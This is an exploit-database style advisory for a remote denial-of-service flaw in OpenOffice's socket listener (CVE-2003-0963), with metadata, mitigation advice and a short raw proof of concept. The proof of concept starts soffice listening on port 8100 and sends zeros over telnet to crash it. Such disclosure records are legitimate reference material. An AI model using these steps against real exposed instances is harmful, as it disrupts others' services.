OpenOffice Remote Denial of Service Vulnerability

vendor:

OpenOffice

by:

Unknown

7.5

CVSS

HIGH

Remote Denial of Service

400

CWE

Product Name: OpenOffice

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2003-0963

CPE: a:openoffice:openoffice

Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-d7af61c8-2cc0-11d8-9355-0020ed76ef5a/

Other Scripts:

Platforms Tested:

Unknown

OpenOffice Remote Denial of Service Vulnerability

OpenOffice is prone to a remote denial of service vulnerability under certain circumstances. The issue presents itself when an attacker connects to a remote OpenOffice session and transmits malicious data to the affected software. The software will apparently fail when handling the malicious data.

Mitigation:

There is no known mitigation for this vulnerability. It is advised to restrict network access to OpenOffice instances and ensure that they are not exposed to untrusted networks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8794/info

OpenOffice provides functionality so that it can be configured to listen on a designated network port for incoming communications.

OpenOffice is prone to a remote denial of service vulnerability under certain circumstances. The issue presents itself when an attacker connects to a remote OpenOffice session and transmits malicious data to the affected software. The software will apparently fail when handling the malicious data.

C:\Programme\oo1.1.0\program> soffice "-accept=socket,host=<ip>,port=8100;urp;"

===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0